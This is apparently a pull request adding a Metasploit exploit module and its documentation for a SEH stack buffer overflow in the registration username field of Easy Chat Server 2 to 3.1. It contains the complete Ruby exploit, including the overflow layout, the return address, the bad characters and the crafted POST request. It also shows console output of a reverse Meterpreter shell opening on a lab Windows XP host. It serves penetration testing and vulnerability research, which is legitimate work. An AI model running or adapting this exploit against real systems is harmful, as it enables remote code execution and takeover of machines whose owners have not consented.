### PR TITLE
Easy Chat Server 2 to 3.1 - Buffer overflow (SEH) exploit

### DIFF
--- a/modules/exploits/windows/http/easychatserver_seh.md
+++ b/modules/exploits/windows/http/easychatserver_seh.md
@@ -1,0 +1,53 @@
+## Description
+
+This module exploits a vulnerability in the EFS Easy Chat Server application, from version 2 to 3.1, affecting the username parameter in Registration page 'register.ghp', which is prone to a stack overflow vulnerability.
+
+This module allows a remote attacker to get a payload executed under the context of the user running the Easy Chat Server application
+
+## Vulnerable Application
+
+[Easy Chat Server](http://echatserver.com/) Easy Chat Server is a easy, fast and affordable way to host and manage real-time communication software.
+
+This module has been tested successfully on
+
+* Easy Chat Server 3.1 on Windows XP En SP3
+
+Installers:
+
+[EFS Easy Chat Server Installers](http://echatserver.com/ecssetup.exe)
+
+## Verification Steps
+
+1. Start `msfconsole`
+2. Do: `use exploits/windows/http/easychatserver_seh`
+3. Do: `set rhosts [IP]`
+4. Do: `exploit`
+5. You should get your payload executed
+
+## Scenarios
+
+```
+marco@kali:~$ msfconsole -q
+msf > use exploit/windows/http/easychatserver_seh
+msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
+RHOST => 192.168.56.101
+msf exploit(easychatserver_seh) > exploit
+ 
+[*] Started reverse TCP handler on 192.168.56.1:4444
+[*] Sending stage (957487 bytes) to 192.168.56.101
+[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
+ 
+meterpreter > sysinfo
+Computer    	: MM-8B040C5B05D9
+OS          	: Windows XP (Build 2600, Service Pack 3).
+Architecture	: x86
+System Language : en_US
+Domain      	: WORKGROUP
+Logged On Users : 2
+Meterpreter 	: x86/windows
+meterpreter > exit
+[*] Shutting down Meterpreter...
+ 
+[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
+msf exploit(easychatserver_seh) >
+```

--- a/modules/exploits/windows/http/easychatserver_seh.rb
+++ b/modules/exploits/windows/http/easychatserver_seh.rb
@@ -1,0 +1,62 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+
+  Rank = NormalRanking
+
+  include Msf::Exploit::Remote::Tcp
+  #include Msf::Exploit::Remote::HttpClient
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Easy Chat Server User Registeration Buffer Overflow (SEH)',
+      'Description'    => %q{
+        This module exploits a buffer overflow during user registration in Easy Chat Server software.
+      },
+      'Author'         =>
+        [
+          'Aitezaz Mohsin', #POC
+          'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          [ 'EDB', '42186' ],
+        ],
+      'Privileged'     => true,
+      'Payload'        =>
+        {
+          'BadChars' => "\x00\x7e\x2b\x26\x3d\x25\x3a\x22\x0a\x0d\x20\x2f\x5c\x2e",
+        },
+      'Platform'       => 'win',
+      'Targets'        =>
+        [
+          [ 'Easy Chat Server 2.0 to 3.1', { 'Ret' => 0x100104bc } ],
+        ],
+      'DefaultOptions' => {
+          'RPORT' => 80,
+          'EXITFUNC' => 'thread',
+          'ENCODER' => 'x86/alpha_mixed'
+        },
+      'DisclosureDate' => 'Oct 09 2017',
+      'DefaultTarget'  => 0))
+  end
+
+  def exploit
+    sploit = rand_text_alpha_upper(217)
+    sploit << "\xeb\x06\x90\x90"
+    sploit << [target.ret].pack('V')
+    sploit << payload.encoded
+    sploit << rand_text_alpha_upper(200)
+    sploit << [target.ret].pack('V')
+
+    request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
+    connect
+    sock.put(request)
+    handler
+    disconnect
+  end
+end

--- a/modules/exploits/windows/http/easychatserver_seh.rb
+++ b/modules/exploits/windows/http/easychatserver_seh.rb
@@ -24,7 +24,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'        => MSF_LICENSE,
       'References'     =>
         [
-          [ 'EDB', '42186' ],
+          [ 'EDB', '42155' ],
         ],
       'Privileged'     => true,
       'Payload'        =>

--- a/modules/exploits/windows/http/easychatserver_seh.rb
+++ b/modules/exploits/windows/http/easychatserver_seh.rb
@@ -7,8 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   Rank = NormalRanking
 
-  include Msf::Exploit::Remote::Tcp
-  #include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpClient
 
   def initialize(info = {})
     super(update_info(info,
@@ -18,8 +17,8 @@ class MetasploitModule < Msf::Exploit::Remote
       },
       'Author'         =>
         [
-          'Aitezaz Mohsin', #POC
-          'Marco Rivoli <marco.rivoli.nvh[at]gmail.com>' #Metasploit
+          'Marco Rivoli', #Metasploit
+          'Aitezaz Mohsin' #POC
         ],
       'License'        => MSF_LICENSE,
       'References'     =>
@@ -52,10 +51,24 @@ class MetasploitModule < Msf::Exploit::Remote
     sploit << payload.encoded
     sploit << rand_text_alpha_upper(200)
 
-    request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
-    connect
-    sock.put(request)
+    res = send_request_cgi({
+      'uri'    => normalize_uri(URI,'registresult.htm'),
+      'method' => 'POST',
+      'vars_post'  => {
+        'UserName' => sploit,
+        'Password' => 'test',
+        'Password1' => 'test',
+        'Sex' => 1,
+        'Email' => 'x@',
+        'Icon' => 'x.gif',
+        'Resume' => 'xxxx',
+        'cw' => 1,
+        'RoomID' => 4,
+        'RepUserName' => 'admin',
+        'submit1' => 'Register'
+      }
+    })
     handler
-    disconnect
+
   end
 end

--- a/modules/exploits/windows/http/easychatserver_seh.rb
+++ b/modules/exploits/windows/http/easychatserver_seh.rb
@@ -51,7 +51,6 @@ class MetasploitModule < Msf::Exploit::Remote
     sploit << [target.ret].pack('V')
     sploit << payload.encoded
     sploit << rand_text_alpha_upper(200)
-    sploit << [target.ret].pack('V')
 
     request = "POST /registresult.htm HTTP/1.1\r\n\r\nUserName=#{sploit}&Password=test&Password1=test&Sex=1&Email=x@&Icon=x.gif&Resume=xxxx&cw=1&RoomID=4&RepUserName=admin&submit1=Register"
     connect


### PR DESCRIPTION
This module exploits a buffer overflow vulnerability of Easy Chat Server. Versions from 2 to 3.1 seem to be affected.

## Verification

Tested on: Windows XP Sp3 English
Vulnerable application: http://echatserver.com/ecssetup.exe

Example output:

```bash
marco@kali:~$ msfconsole -q
msf > use exploit/windows/http/easychatserver_seh
msf exploit(easychatserver_seh) > set RHOST 192.168.56.101
RHOST => 192.168.56.101
msf exploit(easychatserver_seh) > exploit
 
[*] Started reverse TCP handler on 192.168.56.1:4444
[*] Sending stage (957487 bytes) to 192.168.56.101
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.101:1037) at 2017-06-20 00:43:51 +0200
 
meterpreter > sysinfo
Computer    	: MM-8B040C5B05D9
OS          	: Windows XP (Build 2600, Service Pack 3).
Architecture	: x86
System Language : en_US
Domain      	: WORKGROUP
Logged On Users : 2
Meterpreter 	: x86/windows
meterpreter > exit
[*] Shutting down Meterpreter...
 
[*] 192.168.56.101 - Meterpreter session 1 closed.  Reason: User exit
msf exploit(easychatserver_seh) >
```